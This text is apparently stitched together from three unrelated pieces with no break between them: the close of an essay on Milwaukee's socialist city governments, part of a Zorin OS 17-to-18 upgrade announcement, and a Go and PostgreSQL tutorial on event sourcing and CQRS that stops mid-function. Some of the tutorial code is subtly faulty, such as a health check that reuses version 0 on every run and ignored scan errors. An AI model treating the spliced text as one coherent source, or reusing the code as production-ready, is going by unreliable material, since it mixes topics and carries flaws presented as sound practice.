facing radical politics in the US, the remarkable thing about the sewer socialist administrations is how much they achieved. Under SDP rule, Milwaukee dramatically improved health and safety conditions for its citizens in their neighborhoods as well as on the job. Milwaukee built up the country’s first public housing cooperative and it pioneered city planning through comprehensive zoning codes. And though the SDP did not advance as far as it wanted in ending private contracts for all utilities, it succeeded in building a city-owned power plant and municipalizing the stone quarry, street lighting, sewage disposal, and water purification.
Another crown jewel of sewer socialism was its dramatic expansion of parks and playgrounds, as well as its creation of over 40 social centers across Milwaukee. The city leaned on school infrastructure to set up these centers, which provided billiards for teens, education classes and public events for adults, plus sports, games and entertainment for all. “During working hours, we make a living and during leisure hours, we make a life,” was the motto coined by
Dorothy Enderis, who headed the parks and recreation department after 1919.
The city’s excellent provision of recreation, services, and material relief was, according to Mayor Hoan, responsible for it having one of the lowest crime rates of any big city in the nation. In his fascinating 1936 book
City Government: The Record of the Milwaukee Experiment,
Hoan writes that in “Milwaukee we have held that crime prevention [via attacking its social roots] is as important, if not more so, if a comparison is possible, than crime detection and punishment.” Comparing the cost of policing to the cost of social services, Hoan estimated that the city saved over $1,200,000 yearly via its robust parks and recreation department. This did not mean Milwaukee ever considered defunding its police. Sewer socialists in fact pushed for better wages and working conditions for cops, in a relatively successful attempt to win away rank-and-file police from their reactionary chief John Janssen.
After the first significant migration of Black workers arrived in World War I, Mayor Hoan led a
hard fight against the Ku Klux Klan in the city, while Victor Berger (breaking from his earlier racial chauvinism) led
a parallel, high-profile fight in Congress against lynching as well as against immigration restrictions. As historian Joe Trotter notes,
Milwaukee’s Black workers responded by consistently voting Socialist and leaders of the town’s Garveyite Universal Negro Improvement Association joined the SDP and agitated for its candidates.
“Socialist Outing,” from the Milwaukee Public Library’s Socialist Party Collection
Ending graft and promoting governmental efficiency was another major focus. One of the first steps taken by Emil Seidel, the party’s mayor from 1910 through 1912, was to set up a Bureau of Economy and Efficiency — the nation’s first, tasked with streamlining governance. Despite the protestations of some party members, Socialist administrations did not prioritize giving posts to SDP members. Mayor Hoan defended the merit system on anti-capitalist grounds: “You must show the working people and the citizens of the city that the city is as good as and better an employer than private industry if you are to gain headway in convincing them that the municipality is a better owner of the public utilities and industries than private corporations.”
Boosting the public’s confidence in governmental initiatives eventually made it possible for Mayor Hoan to push the limits of acceptability regarding city incursions into the free market. Before and following World War I, Hoan — without city council approval — purchased
train carloads of surplus foods and clothing from the US Army and sold them to the public far below market prices at city offices. The project’s scope was ambitious: in January 1920 alone, Hoan purchased 72,000 cans of peas, 33,600 cans of baked beans, 100,000 pounds of salt, 20,000 pairs of knit gloves and wool socks, among other items. Basking in the project’s success, the mayor noted that “the public sale of food by me has offered an opportunity of demonstrating the Socialist theory of operating a business. It should demonstrate once and for all that the Socialist theory in conducting many of our enterprises without profits can be worked out in a grand and beneficial manner if handled by those who believe in its success.”
In contrast with progressive city administrations nationwide, Milwaukee socialists believed that effective governmental change depended to a large degree on bottom-up organizing. A sense of this can be gleaned from the
Milwaukee Free Press’s story about the SDP’s rally the night it won the mayoral race in 1910:
A full ten minutes the crowd stood up on its feet and cheered for Victor Berger; waved flags and tossed hats high in the air; cried and shouted and even wept, for very overflowing of joy. Then Mr. Berger stepped forward, and a hush fell upon the audience as he began to speak. “I want to ask every man and woman in this audience to stand up here and now enter a solemn pledge to do everything in our power to help the men whom the people have chosen to fulfill their duty,” said Mr. Berger. Like a mighty wave of humanity, the crowd surged to its feet, and in a shout that shook the building and echoed down the street to the thousands who waited there, gave the required pledge.
Grassroots pressure became increasingly urgent once the party lost its short-lived control over the city council. Given Mayor Hoan’s lack of a majority, historian John Gurda
notes that he chose to “take a populist approach to governing, appealing directly to the citizens of Milwaukee to support his reforms and pressure the non-partisan aldermen to support them as well.” The same strategy informed the party’s approach
on a statewide level, leading the SDP to power-map the legislature to figure out pressure points to flip movable office-holders.
Socialist administrations also did everything possible to boost union power. Union labor was used on all city construction and printing projects. With city backing, a unionization wave swept the city’s firemen, garbage collectors, coal passers, and elevator operators, among others. Mayor Seidel even threatened to swear in striking workers as police deputies if the police chief attempted to intimidate strikers.
And in 1935 the SDP succeeded in passing America’s strongest labor law: the “Boncel Ordinance,” which empowered the city administration to close the plants of any company that refused to collectively bargain and whose refusal resulted in crowds of over 200 people two days in a row. Employers who refused to comply would be fined or imprisoned. With support from governmental policy above and workplace organizing below, Milwaukee County’s union density grew tenfold from 1929 through 1939. By the end of the 1930s roughly
60 percent of its workers were in unions. In contrast, New York City at its peak only reached a union density of at most 33 percent.
Mayor Daniel Hoan speaking in front of the Seaman auto plant during a strike. Wisconsin Historical Society.
Demise
Despite labor’s upsurge and the SDP’s continued efforts to educate the public about socialism, the movement’s forward advance was significantly constrained by employer opposition and
public opinion, which as ever was shaped by America’s uniquely challenging terrain, as well as media scaremongering and the normal, expectations-lowering pull
of capitalist social relations.
By the late 1930s, backlash
against union militancy and governmental radicalism had begun to take an electoral toll in Wisconsin and nationwide. Incensed by Mayor Hoan’s refusal to impose an austerity budget, employers had waged a “war” to recall him in 1933. Though they lost that battle, Milwaukee’s bourgeois establishment succeeded in convincing a majority of voters to defeat the SDP’s subsequent referendum to municipalize the electric utility. In 1940, Hoan decisively lost the mayoral race to a handsome but politically vacuous centrist named Carl Zeidler. Sewer socialism’s reign was over. (Another Socialist, Frank Zeidler, became mayor of Milwaukee from 1948 through 1960, but by this time the party was a shell of its former self.)
The central obstacle to moving further toward social democracy and socialism in America was simple: the organized Left and its allied unions were
not powerful enough to convince a majority of people to actively support such an advance. This is a sobering fact to acknowledge, since it runs contrary to radicals’ longtime assumption that misleadership and cooptation are our primary obstacles to success.
But given the many structural challenges facing US leftism, the most remarkable thing about sewer socialism — and the broader New Deal that it helped pioneer — was not its limitations but rather its remarkable advances, which provided an unprecedented degree of economic security and
workplace freedom to countless Americans.
Relevance for Today
The history of sewer socialism provides a roadmap for radicals today aiming to build a viable alternative to Trumpism and Democratic centrism. Milwaukee’s experience shows that the Left not only can govern, but that it can do so considerably more effectively than either establishment politicians or progressive solo operators. That’s the real reason why defenders of the status quo are so worried about a democratic socialist like Zohran Mamdani.
We have much to learn from Wisconsin’s successful efforts to root socialism in the American working class. Unlike uncompromising socialists to their left, the SDP consistently oriented its agitation to the broad mass of working people, rather than a small radicalized periphery; it combined union organizing and disruptive strikes with a hard-nosed focus on winning electoral contests and policy changes; it centered workers’ material needs; it made compromises when necessary; it based its tactics on concrete analyses of public opinion and the relationship of class forces rather than imported formulas or wishful thinking; it saw that fights for widely and deeply felt demands would do more than party propaganda to radicalize millions; and, eventually, it
came to understand
the need to balance political independence with broader alliances.
Today’s radicals would do well to adopt the basic political orientation of Berger’s current. But it would be contrary to the non-dogmatic spirit of the sewer socialists to try to simply copy and paste all of their tactics. Building a nationwide third party, for example, is not feasible in our contemporary context because of exceptionally high ideological
polarization combined with the entrenchment of America’s unique party system over the past century.
As we search for the most effective ways to overcome an increasingly authoritarian and oligarchic status quo, on a terrain of widespread working-class
atomization, it would serve us well to heed Berger’s reminder to his comrades: “We must learn a great deal.”
[This is a working paper, the final version of which will be a much longer essay for
Catalyst, America’s best socialist journal. Subscribe
today to Catalyst and you’ll get my upcoming piece as well as the magazine’s other excellent content. My final paper will take a deeper dive into all the topics touched on above, as well as other questions I didn’t have space here to address, such as the evolution of SDP electoral tactics, how it supported and disciplined its elected officials, its somewhat dogmatic approach initially to labor party and farmer movements, and tensions between grassroots mass organizing and Socialist administrations in Milwaukee.]
His writings have appeared in journals such as Politics & Society, New Labor Forum, and Labor Studies Journal as well as publications such as The Nation, The Guardian, and Jacobin.
A longtime labor activist, Blanc is an organizer trainer in the
Emergency Workplace Organizing Committee, which he helped co-found in March 2020. He directs
The Worker to Worker Collaborative, a center to help unions and rank-and-file groups scale up their efforts by expanding their members’ involvement and leadership.
What’s even more encouraging is that
over 78% of these downloads came from Windows. This influx of new users reflects our mission to provide a better alternative to the incumbent PC operating systems from Big Tech.
We would like to take this moment to extend a massive thank you to everyone who has downloaded, shared, and supported our biggest release ever. Your enthusiasm is what drives us to make Zorin OS even better!
Upgrades from Zorin OS 17 to 18
We’re also excited to announce that we’re officially launching upgrades from Zorin OS 17 to 18 today.
This upgrade path is in early testing and is currently only available to users of the
Zorin OS 17 Core, Education, and Pro
editions. Upgrading now will allow us to collect feedback and fix bugs to improve the user experience before its full stable launch in the coming weeks.
This upgrade path is designed to allow existing Zorin OS 17 users to upgrade their computers to Zorin OS 18 directly, without needing to re-install the operating system. This means you’ll be able to keep your files, apps, and settings, all while taking advantage of the new features and improvements in Zorin OS 18.
How to upgrade from Zorin OS 17 to 18 (in testing)
Warning:
This upgrade path is not recommended for production machines yet. Upgrading during the testing period may cause stability issues or breakages on your system.
To avoid data loss, please back up the important files on your computer to an external drive or cloud storage service.
View how to back up your files ›
Install the latest software updates by opening the Zorin Menu → System Tools → Software Updater and following the on-screen instructions.
Open the Zorin Menu → Utilities → Terminal and enter this command:
gsettings set com.zorin.desktop.upgrader show-test-upgrades true
Follow the instructions in stage 3 of
this guide
to complete the upgrade process.
After the testing period is completed in the coming weeks, this upgrade option will be available to all Zorin OS 17 users through the
Upgrade Zorin OS
app. Stay tuned to our newsletter to be the first to know when upgrades are enabled for everyone.
Event sourcing: append-only architecture processing 10K events/sec with complete history, time travel debugging, and CQRS. From theory to production implementation.
Key Takeaways
Event sourcing provides complete audit trail and time-travel debugging capabilities
CQRS separation enables independent scaling of reads and writes
Snapshots are essential for performance with large event streams
Proper event versioning and migration strategies prevent production disasters
Event streaming with Kafka enables real-time projections and system integration
Your database shows current state. But how did it get there? Who changed what? When? Why?
-- Traditional: Current state only
SELECT balance FROM accounts WHERE id = 123;
-- Result: 1000
-- Event sourced: Complete history
SELECT * FROM events WHERE aggregate_id = 123;
-- Shows every deposit, withdrawal, fee, interest
We needed an audit trail for financial compliance. Event sourcing gave us that, plus time travel, debugging superpowers, and excellent scalability.
Core Concepts in 5 Minutes
Event sourcing stores state changes as a sequence of events rather than overwriting data. Instead of UPDATE statements that destroy history, we append immutable events that tell the complete story.
Traditional systems show what IS. Event sourcing shows what HAPPENED. This distinction transforms debugging, auditing, and analytics. When a bug corrupts data, we can replay events to find exactly when and how it occurred.
Events are facts about the past - they cannot be changed or deleted. This immutability provides natural audit logging and enables powerful patterns like temporal queries and retroactive fixes.
State becomes a left-fold over events. Current balance isn't stored; it's calculated by replaying all deposits and withdrawals. This sounds slow but with snapshots and projections, it's actually faster than traditional systems for many use cases.
// Every event implements a small interface used by the store
// (method implementations omitted for brevity)
type Event interface {
EventType() string
OccurredAt() time.Time
}
// Events capture business intent
type AccountOpened struct {
AccountID string
Currency string
}
type MoneyDeposited struct {
AccountID string
Amount decimal.Decimal
Timestamp time.Time
}
// State derived from event history
func (a *Account) Apply(event Event) {
// Rebuild state by replaying events
}
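To make the "left-fold" idea concrete, here is a minimal sketch that rebuilds an account purely by replaying its history; it assumes the Account aggregate and Apply method fleshed out later in this post.
// Current state is a fold over the event history: start from an empty aggregate
// and apply each event in order. Nothing in storage is ever updated in place.
func rebuildAccount(history []Event) *Account {
	account := &Account{}
	for _, e := range history {
		account.Apply(e)
	}
	return account
}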
Production Event Store
A production event store needs to handle millions of events efficiently. Our PostgreSQL-based implementation processes 10K events/second with proper indexing and partitioning. The append-only nature makes it extremely fast - no updates, no deletes, just inserts.
Event ordering is critical for consistency. We use a per-aggregate version number, enforced with a unique constraint and an optimistic concurrency check, to ensure events are applied in the correct order. This prevents race conditions where concurrent operations might corrupt state.
The schema design balances normalization with query performance. Event data is stored as JSON for flexibility, while frequently queried fields (aggregate_id, event_type) are indexed columns. This hybrid approach enables both fast queries and schema evolution.
Metadata tracks important context: user ID, correlation ID, causation ID. This audit trail proves invaluable for debugging and compliance. Every state change is traceable to its origin.
type EventStore struct {
db *sql.DB
}
type StoredEvent struct {
ID uuid.UUID
AggregateID string
AggregateType string
EventType string
EventVersion int
EventData json.RawMessage
Metadata json.RawMessage
OccurredAt time.Time
RecordedAt time.Time
}
// Append-only schema with proper indexes (PostgreSQL)
const schema = `
CREATE TABLE events (
-- gen_random_uuid() requires PostgreSQL 13+ (or the pgcrypto extension)
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
aggregate_id VARCHAR(255) NOT NULL,
aggregate_type VARCHAR(255) NOT NULL,
event_type VARCHAR(255) NOT NULL,
event_version INT NOT NULL,
event_data JSONB NOT NULL,
metadata JSONB,
occurred_at TIMESTAMP NOT NULL,
recorded_at TIMESTAMP NOT NULL DEFAULT NOW(),
-- Ensure events are ordered per aggregate
UNIQUE(aggregate_id, event_version)
);
-- PostgreSQL has no inline INDEX syntax; create indexes separately
CREATE INDEX idx_aggregate ON events(aggregate_id, event_version);
CREATE INDEX idx_event_type ON events(event_type);
CREATE INDEX idx_occurred_at ON events(occurred_at);
-- Global event sequence for ordering
CREATE SEQUENCE IF NOT EXISTS global_event_sequence;
ALTER TABLE events ADD COLUMN global_sequence BIGINT DEFAULT nextval('global_event_sequence');
CREATE INDEX idx_global_sequence ON events(global_sequence);
`
func (es *EventStore) SaveEvents(ctx context.Context, aggregateID, aggregateType string, events []Event, expectedVersion int) error {
tx, err := es.db.BeginTx(ctx, nil)
if err != nil {
return err
}
defer tx.Rollback()
// Check optimistic concurrency
var currentVersion int
err = tx.QueryRow(`
SELECT COALESCE(MAX(event_version), 0)
FROM events
WHERE aggregate_id = $1`,
aggregateID,
).Scan(&currentVersion)
if err != nil {
return err
}
if currentVersion != expectedVersion {
return fmt.Errorf("concurrency conflict: expected version %d, got %d",
expectedVersion, currentVersion)
}
// Save events
version := expectedVersion
for _, event := range events {
version++
eventData, err := json.Marshal(event)
if err != nil {
return err
}
metadata := map[string]interface{}{
"user_id": ctx.Value("user_id"),
"trace_id": ctx.Value("trace_id"),
"source": ctx.Value("source"),
}
metadataJSON, _ := json.Marshal(metadata)
_, err = tx.Exec(`
INSERT INTO events (
aggregate_id, aggregate_type, event_type,
event_version, event_data, metadata, occurred_at
) VALUES ($1, $2, $3, $4, $5, $6, $7)`,
aggregateID,
aggregateType,
event.EventType(),
version,
eventData,
metadataJSON,
event.OccurredAt(),
)
if err != nil {
return err
}
}
return tx.Commit()
}
func (es *EventStore) GetEvents(ctx context.Context, aggregateID string, fromVersion int) ([]StoredEvent, error) {
rows, err := es.db.QueryContext(ctx, `
SELECT
id, aggregate_id, aggregate_type, event_type,
event_version, event_data, metadata,
occurred_at, recorded_at
FROM events
WHERE aggregate_id = $1 AND event_version > $2
ORDER BY event_version`,
aggregateID, fromVersion,
)
if err != nil {
return nil, err
}
defer rows.Close()
var events []StoredEvent
for rows.Next() {
var e StoredEvent
err := rows.Scan(
&e.ID, &e.AggregateID, &e.AggregateType,
&e.EventType, &e.EventVersion, &e.EventData,
&e.Metadata, &e.OccurredAt, &e.RecordedAt,
)
if err != nil {
return nil, err
}
events = append(events, e)
}
return events, nil
}
Aggregate Root Pattern
type AggregateRoot struct {
ID string
Version int
uncommittedEvents []Event
}
func (a *AggregateRoot) RecordEvent(event Event) {
a.uncommittedEvents = append(a.uncommittedEvents, event)
a.Version++
}
func (a *AggregateRoot) GetUncommittedEvents() []Event {
return a.uncommittedEvents
}
func (a *AggregateRoot) MarkEventsAsCommitted() {
a.uncommittedEvents = []Event{}
}
// Example: Account aggregate
type Account struct {
AggregateRoot
Balance decimal.Decimal
Currency string
Status string
}
func (a *Account) Deposit(amount decimal.Decimal) error {
if amount.LessThanOrEqual(decimal.Zero) {
return fmt.Errorf("invalid deposit amount: %v must be positive", amount)
}
event := MoneyDeposited{
AccountID: a.ID,
Amount: amount,
Timestamp: time.Now(),
}
a.Apply(event)
a.RecordEvent(event)
return nil
}
func (a *Account) Withdraw(amount decimal.Decimal) error {
if amount.LessThanOrEqual(decimal.Zero) {
return fmt.Errorf("invalid withdrawal amount: %v must be positive", amount)
}
if amount.GreaterThan(a.Balance) {
return fmt.Errorf("insufficient funds: attempting to withdraw %v from balance %v", amount, a.Balance)
}
event := MoneyWithdrawn{
AccountID: a.ID,
Amount: amount,
Timestamp: time.Now(),
}
a.Apply(event)
a.RecordEvent(event)
return nil
}
func (a *Account) Apply(event Event) {
switch e := event.(type) {
case MoneyDeposited:
a.Balance = a.Balance.Add(e.Amount)
case MoneyWithdrawn:
a.Balance = a.Balance.Sub(e.Amount)
}
}
CQRS: Command and Query Separation
// Write side: Commands modify aggregates
type CommandHandler struct {
eventStore *EventStore
eventBus *EventBus
}
func (h *CommandHandler) Handle(cmd Command) error {
switch c := cmd.(type) {
case DepositMoney:
return h.handleDeposit(c)
case WithdrawMoney:
return h.handleWithdraw(c)
}
return errors.New("unknown command")
}
func (h *CommandHandler) handleDeposit(cmd DepositMoney) error {
// In production, thread the caller's context through rather than creating one here
ctx := context.Background()
// Load aggregate from events
account := &Account{}
account.ID = cmd.AccountID
storedEvents, err := h.eventStore.GetEvents(ctx, cmd.AccountID, 0)
if err != nil {
return err
}
for _, se := range storedEvents {
// Deserialize the stored payload back into a domain event before applying it
account.Apply(deserializeEvent(se.EventType, se.EventData))
account.Version = se.EventVersion
}
// The version we loaded is the expected version for the optimistic concurrency check
loadedVersion := account.Version
// Execute business logic
err = account.Deposit(cmd.Amount)
if err != nil {
return err
}
// Save new events
err = h.eventStore.SaveEvents(
ctx,
account.ID,
"Account",
account.GetUncommittedEvents(),
loadedVersion,
)
if err != nil {
return err
}
// Publish for projections
for _, event := range account.GetUncommittedEvents() {
h.eventBus.Publish(event)
}
account.MarkEventsAsCommitted()
return nil
}
// Read side: Projections for queries
type AccountProjection struct {
db *sql.DB
}
func (p *AccountProjection) Handle(event Event) error {
switch e := event.(type) {
case MoneyDeposited:
_, err := p.db.Exec(`
UPDATE account_projections
SET balance = balance + $1, updated_at = NOW()
WHERE account_id = $2`,
e.Amount, e.AccountID,
)
return err
case MoneyWithdrawn:
_, err := p.db.Exec(`
UPDATE account_projections
SET balance = balance - $1, updated_at = NOW()
WHERE account_id = $2`,
e.Amount, e.AccountID,
)
return err
}
return nil
}
// Query handler reads from projections
type QueryHandler struct {
db *sql.DB
}
func (q *QueryHandler) GetAccountBalance(accountID string) (decimal.Decimal, error) {
var balance decimal.Decimal
err := q.db.QueryRow(`
SELECT balance FROM account_projections WHERE account_id = $1`,
accountID,
).Scan(&balance)
return balance, err
}
⚠️ Eventual Consistency Tradeoff
CQRS introduces eventual consistency between write and read models:
Events are written immediately to the event store
Projections update asynchronously (typically milliseconds to seconds)
Queries may return stale data until projections catch up
Design your UX to handle this: optimistic UI updates, "processing" states, or read-your-writes guarantees where critical
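One hedged sketch of the last idea above: after a command succeeds, the API waits briefly for the projection to reach the version the command produced before serving the read. The projection_checkpoints table and its aggregate_id/last_version columns are assumptions for illustration, not part of the schema shown earlier.
// Read-your-writes guard (illustrative): poll the projection checkpoint until it
// has processed at least minVersion, or give up when the context expires.
func WaitForProjection(ctx context.Context, db *sql.DB, aggregateID string, minVersion int) error {
	ticker := time.NewTicker(50 * time.Millisecond)
	defer ticker.Stop()
	for {
		var projected int
		err := db.QueryRowContext(ctx,
			`SELECT last_version FROM projection_checkpoints WHERE aggregate_id = $1`,
			aggregateID,
		).Scan(&projected)
		if err == nil && projected >= minVersion {
			return nil // projection caught up; safe to read from the query side
		}
		select {
		case <-ctx.Done():
			return ctx.Err() // caller can fall back to a "processing" state in the UI
		case <-ticker.C:
		}
	}
}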
Snapshots for Performance
type Snapshot struct {
AggregateID string
Version int
Data []byte
CreatedAt time.Time
}
func (es *EventStore) SaveSnapshot(ctx context.Context, snapshot Snapshot) error {
_, err := es.db.ExecContext(ctx, `
INSERT INTO snapshots (aggregate_id, version, data, created_at)
VALUES ($1, $2, $3, $4)
ON CONFLICT (aggregate_id)
DO UPDATE SET version = $2, data = $3, created_at = $4`,
snapshot.AggregateID,
snapshot.Version,
snapshot.Data,
snapshot.CreatedAt,
)
return err
}
func (es *EventStore) GetSnapshot(ctx context.Context, aggregateID string) (*Snapshot, error) {
var s Snapshot
err := es.db.QueryRowContext(ctx, `
SELECT aggregate_id, version, data, created_at
FROM snapshots
WHERE aggregate_id = $1`,
aggregateID,
).Scan(&s.AggregateID, &s.Version, &s.Data, &s.CreatedAt)
if err == sql.ErrNoRows {
return nil, nil
}
return &s, err
}
// Load aggregate with snapshot optimization
func LoadAccount(ctx context.Context, es *EventStore, accountID string) (*Account, error) {
account := &Account{}
account.ID = accountID
// Try to load snapshot
snapshot, err := es.GetSnapshot(ctx, accountID)
if err != nil {
return nil, err
}
fromVersion := 0
if snapshot != nil {
// Restore from snapshot
err = json.Unmarshal(snapshot.Data, account)
if err != nil {
return nil, err
}
fromVersion = snapshot.Version
}
// Apply events after snapshot
events, err := es.GetEvents(ctx, accountID, fromVersion)
if err != nil {
return nil, err
}
for _, e := range events {
// Deserialize stored payloads into domain events before applying them
account.Apply(deserializeEvent(e.EventType, e.EventData))
account.Version = e.EventVersion
}
// Create new snapshot every 100 events
if len(events) > 100 {
snapshotData, _ := json.Marshal(account)
es.SaveSnapshot(ctx, Snapshot{
AggregateID: accountID,
Version: account.Version,
Data: snapshotData,
CreatedAt: time.Now(),
})
}
return account, nil
}
Event Streaming with Kafka
type EventStreamer struct {
eventStore *EventStore
producer *kafka.Writer
lastSeq int64
}
func (s *EventStreamer) StreamEvents(ctx context.Context) {
ticker := time.NewTicker(100 * time.Millisecond)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
s.publishNewEvents(ctx)
}
}
}
func (s *EventStreamer) publishNewEvents(ctx context.Context) {
rows, err := s.eventStore.db.QueryContext(ctx, `
SELECT
global_sequence, aggregate_id, event_type,
event_data, occurred_at
FROM events
WHERE global_sequence > $1
ORDER BY global_sequence
LIMIT 1000`,
s.lastSeq,
)
if err != nil {
return
}
defer rows.Close()
var messages []kafka.Message
var maxSeq int64
for rows.Next() {
var seq int64
var aggregateID, eventType string
var eventData json.RawMessage
var occurredAt time.Time
rows.Scan(&seq, &aggregateID, &eventType, &eventData, &occurredAt)
messages = append(messages, kafka.Message{
Topic: fmt.Sprintf("events.%s", eventType),
Key: []byte(aggregateID),
Value: eventData,
Headers: []kafka.Header{
{Key: "event_type", Value: []byte(eventType)},
{Key: "occurred_at", Value: []byte(occurredAt.Format(time.RFC3339))},
},
})
maxSeq = seq
}
if len(messages) > 0 {
err := s.producer.WriteMessages(ctx, messages...)
if err == nil {
s.lastSeq = maxSeq
}
}
}
Temporal Queries (Time Travel)
// Get account state at specific point in time
func (es *EventStore) GetAggregateAtTime(ctx context.Context, aggregateID string, pointInTime time.Time) (*Account, error) {
events, err := es.db.QueryContext(ctx, `
SELECT event_type, event_data
FROM events
WHERE aggregate_id = $1 AND occurred_at <= $2
ORDER BY event_version`,
aggregateID, pointInTime,
)
if err != nil {
return nil, err
}
defer events.Close()
account := &Account{}
for events.Next() {
var eventType string
var eventData json.RawMessage
events.Scan(&eventType, &eventData)
event := deserializeEvent(eventType, eventData)
account.Apply(event)
}
return account, nil
}
// Replay events for debugging
func ReplayEvents(es *EventStore, from, to time.Time, handler func(Event)) error {
rows, err := es.db.Query(`
SELECT event_type, event_data, occurred_at
FROM events
WHERE occurred_at BETWEEN $1 AND $2
ORDER BY global_sequence`,
from, to,
)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var eventType string
var eventData json.RawMessage
var occurredAt time.Time
rows.Scan(&eventType, &eventData, &occurredAt)
event := deserializeEvent(eventType, eventData)
handler(event)
}
return nil
}
Saga Pattern for Distributed Transactions
type TransferSaga struct {
ID string
FromAccount string
ToAccount string
Amount decimal.Decimal
State string
CompletedSteps []string
}
func (s *TransferSaga) Handle(event Event) ([]Command, error) {
switch e := event.(type) {
case TransferInitiated:
return []Command{
WithdrawMoney{AccountID: e.FromAccount, Amount: e.Amount},
}, nil
case MoneyWithdrawn:
if e.AccountID == s.FromAccount {
s.CompletedSteps = append(s.CompletedSteps, "withdrawn")
return []Command{
DepositMoney{AccountID: s.ToAccount, Amount: s.Amount},
}, nil
}
case MoneyDeposited:
if e.AccountID == s.ToAccount {
s.State = "completed"
return []Command{
MarkTransferComplete{TransferID: s.ID},
}, nil
}
case WithdrawFailed:
s.State = "failed"
return nil, nil
case DepositFailed:
// Compensate - refund the withdrawal
return []Command{
DepositMoney{AccountID: s.FromAccount, Amount: s.Amount},
}, nil
}
return nil, nil
}
Event Store Consistency Warning
Event stores require careful attention to:
Optimistic concurrency control to prevent data corruption
Event ordering guarantees within aggregates
Backup and recovery procedures for event streams
Event schema evolution and versioning strategies
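The last bullet has no code elsewhere in this post, so here is a minimal upcasting sketch. It assumes a hypothetical MoneyDepositedV1 payload that predates the Timestamp field, and a schema-version number carried separately from the per-aggregate event_version (for example, in the event metadata); neither is part of the store shown above.
// Hypothetical upcaster: old payloads are never rewritten in the store; they are
// upgraded in memory at deserialization time.
type MoneyDepositedV1 struct {
	AccountID string
	Amount    decimal.Decimal
}

func upcastMoneyDeposited(schemaVersion int, data json.RawMessage) (MoneyDeposited, error) {
	switch schemaVersion {
	case 1:
		var v1 MoneyDepositedV1
		if err := json.Unmarshal(data, &v1); err != nil {
			return MoneyDeposited{}, err
		}
		// Timestamp did not exist in v1; leave it zero, or fall back to the stored recorded_at
		return MoneyDeposited{AccountID: v1.AccountID, Amount: v1.Amount}, nil
	default:
		var current MoneyDeposited
		err := json.Unmarshal(data, &current)
		return current, err
	}
}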
Security Considerations
Event Sourcing Security Best Practices
Event Encryption: Encrypt sensitive data in event payloads
Access Control: Role-based access to event streams and projections
Audit Trail: Include user context and authorization in event metadata
Data Privacy: Implement "right to be forgotten" through cryptographic erasure
Replay Security: Ensure event replay doesn't bypass current security rules
// Secure event with encryption
type SecureEvent struct {
BaseEvent
EncryptedPayload []byte
KeyID string
Nonce []byte
}
// GDPR-compliant cryptographic erasure
type GDPREventStore struct {
*EventStore
keyManager *KeyManager
}
func (ges *GDPREventStore) ForgetUser(ctx context.Context, userID string) error {
events, err := ges.GetEventsByUser(ctx, userID)
if err != nil {
return fmt.Errorf("failed to find user events: %w", err)
}
for _, event := range events {
if err := ges.keyManager.RevokeKey(event.KeyID); err != nil {
return fmt.Errorf("failed to revoke key %s: %w", event.KeyID, err)
}
}
return ges.MarkUserForgotten(ctx, userID)
}
Testing Strategy
📊 Event Sourcing Testing Framework
Comprehensive testing approach for event-sourced systems:
Event Store Tests: Test consistency, concurrency, and durability
Aggregate Tests: Unit test business logic and invariants
Projection Tests: Verify read model consistency
Integration Tests: End-to-end command/query flows
Event Schema Tests: Test event evolution and migration
// Event store integration test
func TestEventStore(t *testing.T) {
es := setupTestEventStore(t)
defer es.Close()
t.Run("ConcurrencyControl", func(t *testing.T) {
aggregateID := uuid.New().String()
// First save succeeds
err := es.SaveEvents(context.Background(), aggregateID, "Account",
[]Event{&AccountOpened{AccountID: aggregateID}}, 0)
require.NoError(t, err)
// Second save with wrong version fails
err = es.SaveEvents(context.Background(), aggregateID, "Account",
[]Event{&MoneyDeposited{AccountID: aggregateID}}, 0)
require.Error(t, err)
require.Contains(t, err.Error(), "concurrency conflict")
})
}
Production Monitoring
// Event store metrics
type Metrics struct {
EventsWritten prometheus.Counter
EventsRead prometheus.Counter
SnapshotCreated prometheus.Counter
WriteLatency prometheus.Histogram
ReadLatency prometheus.Histogram
}
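A minimal sketch of how these metrics might be constructed and recorded, assuming the standard Prometheus Go client; the metric names are illustrative, not taken from the article.
// Sketch: construct and register the metrics, then record a write.
func NewMetrics() *Metrics {
	m := &Metrics{
		EventsWritten: prometheus.NewCounter(prometheus.CounterOpts{
			Name: "eventstore_events_written_total",
			Help: "Total number of events written to the store.",
		}),
		EventsRead: prometheus.NewCounter(prometheus.CounterOpts{
			Name: "eventstore_events_read_total",
			Help: "Total number of events read from the store.",
		}),
		SnapshotCreated: prometheus.NewCounter(prometheus.CounterOpts{
			Name: "eventstore_snapshots_created_total",
			Help: "Total number of snapshots created.",
		}),
		WriteLatency: prometheus.NewHistogram(prometheus.HistogramOpts{
			Name:    "eventstore_write_latency_seconds",
			Help:    "Event write latency.",
			Buckets: prometheus.DefBuckets,
		}),
		ReadLatency: prometheus.NewHistogram(prometheus.HistogramOpts{
			Name:    "eventstore_read_latency_seconds",
			Help:    "Event read latency.",
			Buckets: prometheus.DefBuckets,
		}),
	}
	prometheus.MustRegister(m.EventsWritten, m.EventsRead, m.SnapshotCreated,
		m.WriteLatency, m.ReadLatency)
	return m
}
// Example usage around a write:
//   start := time.Now()
//   err := es.SaveEvents(ctx, id, "Account", events, version)
//   metrics.WriteLatency.Observe(time.Since(start).Seconds())
//   if err == nil { metrics.EventsWritten.Add(float64(len(events))) }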
// Health checks
func (es *EventStore) HealthCheck(ctx context.Context) error {
// Check write capability
testEvent := HealthCheckEvent{
ID: uuid.New().String(),
Timestamp: time.Now(),
}
err := es.SaveEvents(ctx, "health", "HealthCheck", []Event{testEvent}, 0)
if err != nil {
return fmt.Errorf("write check failed: %w", err)
}
// Check read capability
events, err := es.GetEvents(ctx, "health", 0)
if err != nil {
return fmt.Errorf("read check failed: %w", err)
}
if len(events) == 0 {
return errors.New("no events found")
}
return nil
}
// Lag monitoring
func MonitorProjectionLag(db *sql.DB) {
ticker := time.NewTicker(10 * time.Second)
for range ticker.C {
// NOW() - updated_at is an interval; extract seconds so database/sql can scan it
var lagSeconds float64
if err := db.QueryRow(`
SELECT COALESCE(EXTRACT(EPOCH FROM MAX(NOW() - updated_at)), 0)
FROM projection_checkpoints`,
).Scan(&lagSeconds); err != nil {
continue
}
lag := time.Duration(lagSeconds * float64(time.Second))
projectionLag.Set(lagSeconds)
if lag > 5*time.Minute {
alert("Projection lag exceeds 5 minutes")
}
}
}
Performance Optimizations
// 1. Batch event writes
func (es *EventStore) SaveEventsBatch(events []EventWithAggregate) error {
